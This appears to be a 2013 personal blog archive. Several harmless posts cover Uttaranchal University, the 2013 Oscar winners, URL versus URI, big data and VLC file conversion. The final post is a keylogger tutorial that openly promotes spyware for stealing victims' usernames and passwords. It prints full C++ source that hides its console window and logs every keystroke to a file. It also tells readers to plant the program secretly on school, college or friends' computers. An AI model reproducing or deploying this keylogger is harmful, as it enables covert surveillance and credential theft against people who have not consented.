Pages

Tuesday, 26 February 2013

Uttaranchal University formerly known as UIT

Uttaranchal University formerly known as UIT

Yes! Uttaranchal Institute of Technology is announced UNIVERSITY bu UGC India.

The new logo of this university is very preety and cool the colour Blue still countinues in logo.

now look at this logo
Uttaranchal University logo


how it is. 

Monday, 25 February 2013

OSCAR 2013 winners announced Life of Pi won three categories


The 85th annual Academy Award winners announced, Sunday in Los Angeles:
LIST OF OSCAR 2013 IS BELOW

1. Best Picture: “Argo.”
2. Actor: Daniel Day-Lewis, “Lincoln.”
3. Actress: Jennifer Lawrence, “Silver Linings Playbook.”

4. Supporting Actor: Christoph Waltz, “Django Unchained.”
5. Supporting Actress: Anne Hathaway, “Les Miserables.”

6. Directing: Ang Lee, “Life of Pi.”
7. Foreign Language Film: “Amour.”
8. Adapted Screenplay: Chris Terrio, “Argo.”
9. Original Screenplay: Quentin Tarantino, “Django Unchained.”
10. Animated Feature Film: “Brave.”
11. Production Design: “Lincoln.”
12. Cinematography: “Life of Pi.”
13. Sound Mixing: “Les Miserables.”
14. Sound Editing (tie): “Skyfall,” ”Zero Dark Thirty.”
15. Original Score: “Life of Pi,” Mychael Danna.
16. Original Song: “Skyfall” from “Skyfall,” Adele Adkins and Paul Epworth.
17. Costume: “Anna Karenina.”
18. Documentary Feature: “Searching for Sugar Man.”
19. Documentary (short subject): “Inocente.”
20. Film Editing: “Argo.”
21. Makeup and Hairstyling: “Les Miserables.”
22. Animated Short Film: “Paperman.”
23. Live Action Short Film: “Curfew.”
24. Visual Effects: “Life of Pi.”

‘Argo’ takes best picture at the Oscars

Argo director Ben Affleck accepts the Oscar for Best Movie onstage at the 85th Annual Academy Awards on February 24, 2013 in Hollywood, California. — AFP Photo

Saturday, 23 February 2013

Difference between a URL and a URI


Uniform resource identifier (URI) and Uniform resource locator (URL) these two terms describes different concepts. 
A URI is used to identify something or perticular thing on the World Wide Web.
There are two types of URIs:

  • Uniform Resource Name (URN): URNs basically state what something is, but do not have information on how to access it.
  • Uniform Resource Locator (URL): URLs contain the location of something and tell the client program (usually a browser) how to access it.
Simply put, a URN is the name of something and the URL is the name and address. 


For example, the URL http://www.abcd.com/example1.html tells your browser that a file called example1.html can be accessed through the example domain using the HyperText Transfer Protocol (HTTP). This means that your browser is request that file and display it for you using HTTP.

A URL is a type of URI, along with URNs. Most people will never have to worry about calling a URL a URI by mistake. In fact, in most cases they will be correct in the same way as someone calling a poodle a dog is correct. For people involved in the actual coding of applications, however, the difference is important because not every URI is a URL (just as not every dog is a poodle).

What is "Big Data" means topic for IT field


Big data is a term used to describe the voluminous(Occupying or containing much space; large in volume, in particular )amount of unstructured and semi-structured data a company organization  creates -- data that  takes too much of time and cost to load  a relational database for analysis and implement. Although Big data is not refer to specific quantity of data.

Moto for looking at big data is to discover and invent repeatable business patterns. It’s mainly accepted that unstructured data, most of it located in text files and we all know what is text file is , accounts for at least 80% of an organization’s data. If left unmanaged, the sheer(extra ordinary)  volume of unstructured data that is generated  yearly within an enterprise or organization  can be costly in terms of storage of Data. Unmanaged data can also pose a liability if information cannot be located.
Big data is often associated with cloud computing because the analysis of large data world  in real-time requires a framework like MapReduce to distribute the work among tens, hundreds or even thousands of computers. 


Thursday, 21 February 2013

How to use VLC Media Player as Media File Types Converter


How to use VLC Media Player as Media File Types Converter




A Music Player which supports many File Types is VLC media player.VLC can not used to Play just the mp3s and Video also be used to Convert the Media File Types.
So to use this just follow these steps :



11)   Open VLC Media Player.

22)    Click on Media and select Convert / Save (Ctrl+R ) Option.

33)    Now Add the Files by using Add Button on the new Window which appeared.

44)    Now Click on Convert / Save Button and this will Open an Another Window.

55)    Now select the Destination File and Profile ( Conversion Format ) as you wish dude.
 Finally Click on the Start Button to Begin the Conversion and it is done.

How to create a key logger using c++

How  to create a key logger using c++
Key logger is a BEST spyware program which can be used to get username and password of the victim to hack or enter in personal accounts .To create key logger using c++ COUNTINUE reading the post.
How we have to do for this?
We can install this spyware in our college, school or a friend's system and get usernames and passwords of the users.
Advantage of key logger is that it is very simple easy method and also the victim can't detect that we are hacking him or her to create key logger using c++ we need is c++ program and follow these simple steps :





Open the c++ compiler.
Go to file  >>  new  >>  source file.
Copy and paste the following keylogger code into blank work space :

#include using namespace std; #include #include int Save (int key_stroke, char *file);void Stealth();int main() {Stealth(); char i;while (1){for(i = 8; i <= 190; i++){if (GetAsyncKeyState(i) == -32767)Save (i,"LOG.txt");}}system ("PAUSE");return 0;}int Save (int key_stroke, char *file){if ( (key_stroke == 1) || (key_stroke == 2) )return 0;FILE *OUTPUT_FILE;OUTPUT_FILE = fopen(file, "a+");cout << key_stroke << endl;if (key_stroke == 8)fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); else if (key_stroke == 13)fprintf(OUTPUT_FILE, "%s", "\n"); else if (key_stroke == 32)fprintf(OUTPUT_FILE, "%s", " ");else if (key_stroke == VK_TAB) fprintf(OUTPUT_FILE, "%s", "[TAB]");else if (key_stroke == VK_SHIFT)fprintf(OUTPUT_FILE, "%s", "[SHIFT]");else if (key_stroke == VK_CONTROL)fprintf(OUTPUT_FILE, "%s", "[CONTROL]");else if (key_stroke == VK_ESCAPE)fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");else if (key_stroke == VK_END)fprintf(OUTPUT_FILE, "%s", "[END]");else if (key_stroke == VK_HOME)fprintf(OUTPUT_FILE, "%s", "[HOME]");else if (key_stroke == VK_LEFT)fprintf(OUTPUT_FILE, "%s", "[LEFT]");else if (key_stroke == VK_UP)fprintf(OUTPUT_FILE, "%s", "[UP]");else if (key_stroke == VK_RIGHT)fprintf(OUTPUT_FILE, "%s", "[RIGHT]");else if (key_stroke == VK_DOWN)fprintf(OUTPUT_FILE, "%s", "[DOWN]");else if (key_stroke == 190 || key_stroke == 110)fprintf(OUTPUT_FILE, "%s", ".");else fprintf(OUTPUT_FILE, "%s", &key_stroke);fclose (OUTPUT_FILE);return 0;}void Stealth(){HWND Stealth;AllocConsole();Stealth = FindWindowA("ConsoleWindowClass", NULL);ShowWindow(Stealth,0);}



Now compile the code . Now execute the program by pressing Ctrl + F10. Now the keylogger will run in the system. Whatever we type using keyboard would be stored in log.txt file in folder where we saved the file. Now if someone have physical access to college or school system, then copy the .exe file in that system and run on it.